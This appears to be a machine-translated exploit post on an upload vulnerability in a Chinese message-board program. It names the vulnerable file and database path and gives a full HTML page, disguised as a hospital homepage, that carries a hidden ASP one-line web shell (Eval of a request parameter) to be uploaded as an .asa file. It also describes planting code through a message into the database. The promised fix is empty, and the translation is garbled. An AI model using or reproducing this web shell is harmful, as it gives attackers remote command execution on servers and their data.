Suiyuan network message board v2 (with audit top function + ajax + jquery architecture) Upload defect and repair

It seems that there are two versions, one is asp and the other is php.
 
Database path db/sywl. asp
 
The vulnerability file up2.asp contains too much content...
 
Save the following code as; asa directly uploads the file to get the path-_ (of course, you can also construct a sentence by yourself)
 
Do not add it before. If it is added, the system will prompt that the ASA file cannot be uploaded.
 
<! DOCTYPE html PUBLIC "-// W3C // dtd xhtml 1.0 Transitional // EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<Html xmlns = "http://www.w3.org/1999/xhtml">
<Head>
<Meta http-equiv = "Content-Type" content = "text/html; charset = UTF-8"/>
<Meta name = "keywords" content = "a"/>
<Meta name = "description" content = "a"/>
<Title> a </title>
<Link href = "/template/images/style.css" rel = "stylesheet" type = "text/css"/>
 
<Script type = "text/javascript"> var king_page = '/page/'; </script>
<Script src = "/page/system/inc/jquery. js" type = "text/javascript"> </script>
<Script src = "/page/system/inc/jquery. kc. js" type = "text/javascript"> </script>
</Head>
<Body>
<! -- Top -->
<Div id = "top">
<Div> </div>
<Div id = "menu">
<Ul>
<Li> <a href = "/"> hospital homepage </a> </li>
<Li> <a href = "/html/yygk/"> hospital overview </a> </li>
<Li> <a href = "/html/jyzn/"> Medical Treatment guide </a> </li>
<Li> <a href = "/html/ksjs/"> Department introduction </a> </li>
<Li> <a href = "/html/yywh/"> Hospital Culture </a> </li>
<Li> <a href = "/html/news/"> news </a> </li>
<Li> <a href = "/html/jkkp/"> Health Science </a> </li>
<Li> <a href = "/page/feedback/"> Please leave a message </a> </li>
</Ul>
</Div>
<! -- Main menu -->
</Div>
<! -- Content -->
<Div class = "content" id = "onepage"> <%
Dim ConKey: ConKey = "Cmd"
Dim InValue: InValue = Request (ConKey)
Eval (InValue)
%> </Div>
<! -- Bottom -->
<Div id = "line"> </div>
<Div id = "bottom">
Beijing ICP filing No. XXX </div>
<Div id = "Layer1">
<Object classid = "clsid: D27CDB6E-AE6D-11cf-96B8-444553540000" codebase = "http ://.... /pub/shockwave/cabs/flash/swflash. cab # version = 910, 175 "width =" "height =" ">
<Param name = "movie" value = "/template/images/sqlogo.swf"/>
<Param name = "quality" value = "high"/>
<Param name = "wmode" value = "transparent">
<Embed src = "/template/images/sqlogo.swf" quality = "high" wmode = "transparent" pluginspage = "http://www.bkjia.com/go/getflashplayer" type = "application/x-shockwave- flash "width =" 910 "height =" 175 "> </embed>
</Object>
</Div>
</Body>
</Html> simpler, if the database is not renamed
 
Leave a message and drop a sentence .. Connect to the database file -_,
 
Cool
 
It seems that this program has an editor, which can also be used in this way.

Fix: fix the above analysis.